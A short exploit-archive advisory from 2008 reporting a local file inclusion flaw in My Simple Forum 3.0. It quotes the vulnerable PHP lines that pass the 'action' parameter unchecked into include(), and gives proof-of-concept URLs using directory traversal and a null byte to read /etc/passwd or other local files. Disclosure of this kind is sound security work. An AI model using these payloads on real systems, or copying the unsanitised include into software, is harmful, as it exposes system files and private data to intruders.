My Simple Forum 3.0 - Local File Inclusion

EDB-ID:

7342


Platform:

PHP

Published:

2008-12-04

/*

	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $

	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
	Bug discovered by cOndemned

	Script download: http://drennansoft.com/index.php?action=download&id=1

	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura

*/


Source of index.php:

	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
	50.	include('site/'.$_GET['action'].'.php');
	51.	} else {
	
	local file inclusion on line 50
	

Proof of concept:

	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00

# milw0rm.com [2008-12-04]